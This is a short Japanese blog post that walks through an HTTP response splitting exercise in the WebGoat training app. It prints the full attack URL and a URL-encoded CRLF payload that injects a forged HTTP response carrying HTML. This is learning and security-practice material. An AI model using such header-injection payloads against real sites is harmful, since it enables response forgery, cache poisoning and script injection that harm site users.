shikata ga nai

Private? There is no such things.

WebGoatでHTTP Splittingをやってみた

Hello there, ('ω')ノ

 

本日もKali Linuxで心が折れる一日で。

updateのエラーが解決できず。

久しぶりに本日はあきらめることに。

 

f:id:ThisIsOne:20201118184310p:plain

 

これまでCRLFに関するHTTPリクエストヘッダインジェクションがなかったもので。

WebGoatを起動して、HTTP Splittingを選択して。

 

f:id:ThisIsOne:20201118191025p:plain

 

正常動作を確認して。

 

f:id:ThisIsOne:20201118191123p:plain


最後のjaというパラメータ値を変更して実行してみると。

 

f:id:ThisIsOne:20201118184619p:plain

 

ちなみに最後のパラメータ値jaを置き換えた全体のURLは以下のとおりで。

 

10.4.129.77/WebGoat/attack?Screen=3&menu=100&fromRedirect=yes&language=%0d%0aContent-Length: 0%0a%0aHTTP/1.1 200 OK%0aContent-Type:text/html%0aLast-Modified:%0a%0a<html>TESTE</html>

 

f:id:ThisIsOne:20201118184747p:plain

 

置き換えたペイロード自体は以下のとおりで。

 

%0d%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:text/html%0aLast-Modified:%0a%0a%3Chtml%3ETESTE%3C/html%3E

 

デコードしてみると。

なかなか脆弱性診断ガイドラインの説明だけでは初心者にはわかりづらいかと。

 

f:id:ThisIsOne:20201118184654p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain